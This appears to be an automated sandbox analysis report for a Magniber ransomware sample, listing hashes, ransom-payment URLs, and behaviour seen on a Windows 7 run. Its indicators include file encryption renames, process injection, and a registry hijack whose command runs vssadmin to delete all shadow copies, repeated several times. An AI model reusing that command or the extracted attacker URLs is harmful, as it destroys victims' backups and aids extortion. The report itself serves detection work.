Analysis
-
max time kernel
128s -
max time network
147s -
platform
windows7_x64 -
resource
win7v20210408 -
submitted
22-05-2021 10:53
Static task
static1
Behavioral task
behavioral1
Sample
7ec95111e00ce9c19ebf88e9683363390873451b00e0348bca4d80ef1e4b20ed.exe
Resource
win7v20210408
Behavioral task
behavioral2
Sample
7ec95111e00ce9c19ebf88e9683363390873451b00e0348bca4d80ef1e4b20ed.exe
Resource
win10v20210410
General
-
Target
7ec95111e00ce9c19ebf88e9683363390873451b00e0348bca4d80ef1e4b20ed.exe
-
Size
22KB
-
MD5
c6b6ec00b64069d66c8d14d65f7cfd8f
-
SHA1
b90e6bf12728fa3b0984aabc32b39f1db082a1da
-
SHA256
7ec95111e00ce9c19ebf88e9683363390873451b00e0348bca4d80ef1e4b20ed
-
SHA512
c9d7c97c63806e87804c33530f48ba950542ba28421d354cb287c9bf027ff5a853b76200e87eadd3cde0469f4b8c93f8c4bc0e71f5e4aa1cdf33e05c0673254a
Malware Config
Extracted
C:\Users\Admin\Desktop\readme.txt
magniber
http://4c48acb82e784a70aecsnwyqmwa.erpp3f6j634gmj33.onion/csnwyqmwa
http://4c48acb82e784a70aecsnwyqmwa.jobsbig.cam/csnwyqmwa
http://4c48acb82e784a70aecsnwyqmwa.nowuser.casa/csnwyqmwa
http://4c48acb82e784a70aecsnwyqmwa.boxgas.icu/csnwyqmwa
http://4c48acb82e784a70aecsnwyqmwa.bykeep.club/csnwyqmwa
Signatures
-
Magniber Ransomware
Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.
-
Process spawned unexpected child process 8 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1520 1640 cmd.exe 45 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1920 1640 cmd.exe 45 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1692 1640 cmd.exe 45 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1016 1640 cmd.exe 45 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 720 1640 vssadmin.exe 45 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1788 1640 vssadmin.exe 45 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1644 1640 vssadmin.exe 45 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1368 1640 vssadmin.exe 45 -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies extensions of user files 13 IoCs
Ransomware generally changes the extension on encrypted files.
description ioc Process File renamed C:\Users\Admin\Pictures\BackupStart.png => C:\Users\Admin\Pictures\BackupStart.png.csnwyqmwa taskhost.exe File renamed C:\Users\Admin\Pictures\InstallOptimize.png => C:\Users\Admin\Pictures\InstallOptimize.png.csnwyqmwa taskhost.exe File renamed C:\Users\Admin\Pictures\MountMove.tif => C:\Users\Admin\Pictures\MountMove.tif.csnwyqmwa taskhost.exe File renamed C:\Users\Admin\Pictures\ReceiveEnter.png => C:\Users\Admin\Pictures\ReceiveEnter.png.csnwyqmwa taskhost.exe File opened for modification C:\Users\Admin\Pictures\RevokeRemove.tiff taskhost.exe File renamed C:\Users\Admin\Pictures\ImportFormat.crw => C:\Users\Admin\Pictures\ImportFormat.crw.csnwyqmwa taskhost.exe File renamed C:\Users\Admin\Pictures\AssertFind.png => C:\Users\Admin\Pictures\AssertFind.png.csnwyqmwa taskhost.exe File opened for modification C:\Users\Admin\Pictures\ConvertFromPublish.tiff taskhost.exe File renamed C:\Users\Admin\Pictures\ConvertFromPublish.tiff => C:\Users\Admin\Pictures\ConvertFromPublish.tiff.csnwyqmwa taskhost.exe File renamed C:\Users\Admin\Pictures\DismountUnpublish.tif => C:\Users\Admin\Pictures\DismountUnpublish.tif.csnwyqmwa taskhost.exe File renamed C:\Users\Admin\Pictures\PushMerge.tif => C:\Users\Admin\Pictures\PushMerge.tif.csnwyqmwa taskhost.exe File renamed C:\Users\Admin\Pictures\RevokeRemove.tiff => C:\Users\Admin\Pictures\RevokeRemove.tiff.csnwyqmwa taskhost.exe File renamed C:\Users\Admin\Pictures\StopDeny.png => C:\Users\Admin\Pictures\StopDeny.png.csnwyqmwa taskhost.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 1788 set thread context of 1124 1788 7ec95111e00ce9c19ebf88e9683363390873451b00e0348bca4d80ef1e4b20ed.exe 15 PID 1788 set thread context of 1196 1788 7ec95111e00ce9c19ebf88e9683363390873451b00e0348bca4d80ef1e4b20ed.exe 11 PID 1788 set thread context of 1256 1788 7ec95111e00ce9c19ebf88e9683363390873451b00e0348bca4d80ef1e4b20ed.exe 14 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Interacts with shadow copies 2 TTPs 4 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 720 vssadmin.exe 1788 vssadmin.exe 1644 vssadmin.exe 1368 vssadmin.exe -
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Toolbar\Locked = "1" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Toolbar Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 20ee0c300a4fd701 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000529101d5c9814b4eb0f580b37542e45000000000020000000000106600000001000020000000201add8839cda93f8383ff52700d263065ba7a5f658af5008ad64463602777dc000000000e8000000002000020000000e7aaccdcc94b82d5eb73e198b12c8d3d5c50b40dfab009aa03cb6465989d7adc2000000061d64e0818e8816f9e8dccc47f1660b3caef98efd41ef4245f1a2d5c689f126540000000c51245b7c7ef5398812b63d70565d1029e5545052a5d2bd939ac6051565359447541b1f4150d97819074ef85c0ac55c75242abc8a6f3ea3de2ebb4ac87f5bf53 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{48A4E571-BAFD-11EB-9620-C69637D5751C} = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000529101d5c9814b4eb0f580b37542e45000000000020000000000106600000001000020000000abb72794e8ce6e37a578199bc361de9d9a21c47179779e3f32f61462f5e7d5c9000000000e800000000200002000000094eefe66e488867cc4b7668e958b4889f46474101808e75593d2d86301e69b559000000085f23295a375aedbf45b3f6b95836907a0cfbd616d54d68affcbfc14b4794458999bef18761b1e5e0e7245891923b026e88ebe6b53cd24a48a403ac45f0a61dd1e0cf99900909c20b8ba3ace813e4a71a111945e843bf7ad33cd2efb1c82ebb935a3e57b583a2846f27d305522d292c9f15baff6624ce898d3d6b4d1064c8d78d28fb42afb2de70a6ab4dc7a24147fa5400000000f3233143e93a7fa82ffea55b6b075447f33ad30a3bee4390c86f884738aea68e5bfebb7f7892b7aef8864887a92526b6dd90fef4d7129d8fda4ad2a7807102f iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "327850150" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE -
Modifies registry class 50 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\mscfile\shell\open taskhost.exe Set value (int) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{C4D98F09-6124-4FE0-9942-826416082DA9}\FFlags = "1092616193" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{C4D98F09-6124-4FE0-9942-826416082DA9}\IconSize = "48" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 = 200000001a00eebbfe230000100090e24d373f126545916439c4925e467b00000000 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 00000000ffffffff Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\mscfile\shell taskhost.exe Set value (data) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{C4D98F09-6124-4FE0-9942-826416082DA9}\Rev = "0" Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{C4D98F09-6124-4FE0-9942-826416082DA9}\Vid = "{65F125E5-7BE1-4810-BA9D-D271C8432CE3}" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{C4D98F09-6124-4FE0-9942-826416082DA9}\Mode = "6" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{C4D98F09-6124-4FE0-9942-826416082DA9}\LogicalViewMode = "2" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\NodeSlot = "1" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{C4D98F09-6124-4FE0-9942-826416082DA9}\GroupByKey:PID = "0" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{C4D98F09-6124-4FE0-9942-826416082DA9}\GroupByDirection = "1" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\mscfile\shell\open\command Dwm.exe Set value (data) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{C4D98F09-6124-4FE0-9942-826416082DA9}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a000000a000000030f125b7ef471a10a5f102608c9eebac0e0000007800000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\MRUListEx = ffffffff Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\mscfile\shell\open\command taskhost.exe Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" Dwm.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\mscfile\shell\open\command Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{C4D98F09-6124-4FE0-9942-826416082DA9} Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202 Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" taskhost.exe Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f4225481e03947bc34db131e946b44c8dd50000 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\mscfile taskhost.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\mscfile\shell\open\command vssadmin.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{C4D98F09-6124-4FE0-9942-826416082DA9}\FFlags = "1092616209" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{C4D98F09-6124-4FE0-9942-826416082DA9}\GroupView = "0" Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{C4D98F09-6124-4FE0-9942-826416082DA9}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\NodeSlot = "2" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\KnownFolderDerivedFolderType = "{57807898-8C4F-4462-BB63-71042380B109}" Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Generic" Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" vssadmin.exe Set value (data) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = ffffffff Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{C4D98F09-6124-4FE0-9942-826416082DA9}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 = 14001f44471a0359723fa74489c55595fe6b30ee0000 Explorer.EXE -
Opens file in notepad (likely ransom note) 1 IoCs
pid Process 1320 notepad.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1788 7ec95111e00ce9c19ebf88e9683363390873451b00e0348bca4d80ef1e4b20ed.exe 1788 7ec95111e00ce9c19ebf88e9683363390873451b00e0348bca4d80ef1e4b20ed.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 1256 Explorer.EXE -
Suspicious behavior: MapViewOfSection 3 IoCs
pid Process 1788 7ec95111e00ce9c19ebf88e9683363390873451b00e0348bca4d80ef1e4b20ed.exe 1788 7ec95111e00ce9c19ebf88e9683363390873451b00e0348bca4d80ef1e4b20ed.exe 1788 7ec95111e00ce9c19ebf88e9683363390873451b00e0348bca4d80ef1e4b20ed.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 1256 Explorer.EXE Token: SeShutdownPrivilege 1256 Explorer.EXE Token: SeIncreaseQuotaPrivilege 952 WMIC.exe Token: SeSecurityPrivilege 952 WMIC.exe Token: SeTakeOwnershipPrivilege 952 WMIC.exe Token: SeLoadDriverPrivilege 952 WMIC.exe Token: SeSystemProfilePrivilege 952 WMIC.exe Token: SeSystemtimePrivilege 952 WMIC.exe Token: SeProfSingleProcessPrivilege 952 WMIC.exe Token: SeIncBasePriorityPrivilege 952 WMIC.exe Token: SeCreatePagefilePrivilege 952 WMIC.exe Token: SeBackupPrivilege 952 WMIC.exe Token: SeRestorePrivilege 952 WMIC.exe Token: SeShutdownPrivilege 952 WMIC.exe Token: SeDebugPrivilege 952 WMIC.exe Token: SeSystemEnvironmentPrivilege 952 WMIC.exe Token: SeRemoteShutdownPrivilege 952 WMIC.exe Token: SeUndockPrivilege 952 WMIC.exe Token: SeManageVolumePrivilege 952 WMIC.exe Token: 33 952 WMIC.exe Token: 34 952 WMIC.exe Token: 35 952 WMIC.exe Token: SeShutdownPrivilege 1256 Explorer.EXE Token: SeIncreaseQuotaPrivilege 1836 WMIC.exe Token: SeSecurityPrivilege 1836 WMIC.exe Token: SeTakeOwnershipPrivilege 1836 WMIC.exe Token: SeLoadDriverPrivilege 1836 WMIC.exe Token: SeSystemProfilePrivilege 1836 WMIC.exe Token: SeSystemtimePrivilege 1836 WMIC.exe Token: SeProfSingleProcessPrivilege 1836 WMIC.exe Token: SeIncBasePriorityPrivilege 1836 WMIC.exe Token: SeCreatePagefilePrivilege 1836 WMIC.exe Token: SeBackupPrivilege 1836 WMIC.exe Token: SeRestorePrivilege 1836 WMIC.exe Token: SeShutdownPrivilege 1836 WMIC.exe Token: SeDebugPrivilege 1836 WMIC.exe Token: SeSystemEnvironmentPrivilege 1836 WMIC.exe Token: SeRemoteShutdownPrivilege 1836 WMIC.exe Token: SeUndockPrivilege 1836 WMIC.exe Token: SeManageVolumePrivilege 1836 WMIC.exe Token: 33 1836 WMIC.exe Token: 34 1836 WMIC.exe Token: 35 1836 WMIC.exe Token: SeIncreaseQuotaPrivilege 288 WMIC.exe Token: SeSecurityPrivilege 288 WMIC.exe Token: SeTakeOwnershipPrivilege 288 WMIC.exe Token: SeLoadDriverPrivilege 288 WMIC.exe Token: SeSystemProfilePrivilege 288 WMIC.exe Token: SeSystemtimePrivilege 288 WMIC.exe Token: SeProfSingleProcessPrivilege 288 WMIC.exe Token: SeIncBasePriorityPrivilege 288 WMIC.exe Token: SeCreatePagefilePrivilege 288 WMIC.exe Token: SeBackupPrivilege 288 WMIC.exe Token: SeRestorePrivilege 288 WMIC.exe Token: SeShutdownPrivilege 288 WMIC.exe Token: SeDebugPrivilege 288 WMIC.exe Token: SeSystemEnvironmentPrivilege 288 WMIC.exe Token: SeRemoteShutdownPrivilege 288 WMIC.exe Token: SeUndockPrivilege 288 WMIC.exe Token: SeManageVolumePrivilege 288 WMIC.exe Token: 33 288 WMIC.exe Token: 34 288 WMIC.exe Token: 35 288 WMIC.exe Token: SeIncreaseQuotaPrivilege 1792 WMIC.exe -
Suspicious use of FindShellTrayWindow 7 IoCs
pid Process 1256 Explorer.EXE 1064 iexplore.exe 1256 Explorer.EXE 1256 Explorer.EXE 1256 Explorer.EXE 1256 Explorer.EXE 1256 Explorer.EXE -
Suspicious use of SendNotifyMessage 24 IoCs
pid Process 1256 Explorer.EXE 1256 Explorer.EXE 1256 Explorer.EXE 1256 Explorer.EXE 1256 Explorer.EXE 1256 Explorer.EXE 1256 Explorer.EXE 1256 Explorer.EXE 1256 Explorer.EXE 1256 Explorer.EXE 1256 Explorer.EXE 1256 Explorer.EXE 1256 Explorer.EXE 1256 Explorer.EXE 1256 Explorer.EXE 1256 Explorer.EXE 1256 Explorer.EXE 1256 Explorer.EXE 1256 Explorer.EXE 1256 Explorer.EXE 1256 Explorer.EXE 1256 Explorer.EXE 1256 Explorer.EXE 1256 Explorer.EXE -
Suspicious use of SetWindowsHookEx 8 IoCs
pid Process 1064 iexplore.exe 1064 iexplore.exe 1704 IEXPLORE.EXE 1704 IEXPLORE.EXE 1704 IEXPLORE.EXE 1704 IEXPLORE.EXE 1256 Explorer.EXE 1256 Explorer.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1124 wrote to memory of 1320 1124 taskhost.exe 26 PID 1124 wrote to memory of 1320 1124 taskhost.exe 26 PID 1124 wrote to memory of 1320 1124 taskhost.exe 26 PID 1124 wrote to memory of 2032 1124 taskhost.exe 28 PID 1124 wrote to memory of 2032 1124 taskhost.exe 28 PID 1124 wrote to memory of 2032 1124 taskhost.exe 28 PID 1124 wrote to memory of 1932 1124 taskhost.exe 29 PID 1124 wrote to memory of 1932 1124 taskhost.exe 29 PID 1124 wrote to memory of 1932 1124 taskhost.exe 29 PID 1196 wrote to memory of 2024 1196 Dwm.exe 32 PID 1196 wrote to memory of 2024 1196 Dwm.exe 32 PID 1196 wrote to memory of 2024 1196 Dwm.exe 32 PID 1932 wrote to memory of 952 1932 cmd.exe 38 PID 1932 wrote to memory of 952 1932 cmd.exe 38 PID 1932 wrote to memory of 952 1932 cmd.exe 38 PID 1788 wrote to memory of 296 1788 vssadmin.exe 34 PID 1788 wrote to memory of 296 1788 vssadmin.exe 34 PID 1788 wrote to memory of 296 1788 vssadmin.exe 34 PID 2032 wrote to memory of 1064 2032 cmd.exe 36 PID 2032 wrote to memory of 1064 2032 cmd.exe 36 PID 2032 wrote to memory of 1064 2032 cmd.exe 36 PID 1256 wrote to memory of 544 1256 Explorer.EXE 35 PID 1256 wrote to memory of 544 1256 Explorer.EXE 35 PID 1256 wrote to memory of 544 1256 Explorer.EXE 35 PID 2024 wrote to memory of 288 2024 cmd.exe 39 PID 2024 wrote to memory of 288 2024 cmd.exe 39 PID 2024 wrote to memory of 288 2024 cmd.exe 39 PID 296 wrote to memory of 1836 296 cmd.exe 41 PID 296 wrote to memory of 1836 296 cmd.exe 41 PID 296 wrote to memory of 1836 296 cmd.exe 41 PID 544 wrote to memory of 1792 544 cmd.exe 42 PID 544 wrote to memory of 1792 544 cmd.exe 42 PID 544 wrote to memory of 1792 544 cmd.exe 42 PID 1520 wrote to memory of 2016 1520 cmd.exe 55 PID 1520 wrote to memory of 2016 1520 cmd.exe 55 PID 1520 wrote to memory of 2016 1520 cmd.exe 55 PID 1920 wrote to memory of 912 1920 cmd.exe 